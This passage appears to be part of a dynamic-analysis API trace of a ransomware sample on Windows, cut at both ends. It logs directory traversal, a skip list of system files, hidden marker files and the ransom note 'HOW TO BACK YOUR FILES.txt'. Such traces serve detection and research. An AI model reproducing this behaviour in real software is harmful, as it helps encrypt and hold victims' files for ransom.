ftLastAccessTime.dwLowDateTime=0xf0eefcb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0eefcb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.460] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.460] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.460] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0066.460] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0066.460] lstrcpyW (in: lpString1=0x130ec00, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0066.460] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0066.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0066.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x126138 [0066.461] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x11cf48 [0066.461] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0066.461] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0066.461] lstrcpyW (in: lpString1=0x130ec00, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0066.461] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0066.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0066.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe0) returned 0x125828 [0066.462] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122108 [0066.462] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0066.462] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0066.462] lstrcpyW (in: lpString1=0x130ec00, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0066.462] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0066.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0066.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe0) returned 0x125658 [0066.462] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x122128 [0066.462] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0066.462] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.462] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0066.463] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0066.463] lstrcpyW (in: lpString1=0x130ec00, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0066.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0066.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11c148 [0066.463] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x1222a8 [0066.463] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0066.463] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.463] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.463] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.464] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.464] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.464] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.464] CloseHandle (hObject=0x27c) returned 1 [0066.465] CloseHandle (hObject=0x228) returned 1 [0066.465] GetCurrentThreadId () returned 0xd98 [0066.465] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0066.465] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp" [0066.465] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c148 | out: hHeap=0xe0000) returned 1 [0066.465] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0066.465] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp" [0066.465] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\" [0066.465] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0066.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.466] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.469] FlushFileBuffers (hFile=0x228) returned 1 [0066.469] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.469] CloseHandle (hObject=0x228) returned 1 [0066.470] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp") returned 104 [0066.470] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.470] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0066.470] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.470] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.470] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.470] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.470] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.470] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.470] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.470] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.470] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.470] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.470] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f1607a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f1607a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.471] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.471] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.471] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f1607a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f1607a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.471] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0066.471] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.471] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.471] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.471] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.472] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.472] CloseHandle (hObject=0x27c) returned 1 [0066.472] CloseHandle (hObject=0x228) returned 1 [0066.472] GetCurrentThreadId () returned 0xd98 [0066.472] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0066.472] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory" [0066.472] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125658 | out: hHeap=0xe0000) returned 1 [0066.472] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0066.472] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory" [0066.472] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\" [0066.472] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0066.472] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.473] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.476] FlushFileBuffers (hFile=0x228) returned 1 [0066.476] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.476] CloseHandle (hObject=0x228) returned 1 [0066.477] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory") returned 111 [0066.477] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.477] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0066.477] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.477] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.477] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.477] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.477] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74116aed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.477] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.477] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.477] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.477] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.477] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.477] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f1607a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f1607a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.477] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.477] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.477] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0f1607a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0f1607a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0f1607a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.477] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0066.478] lstrcpyW (in: lpString1=0x130ec18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.478] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: 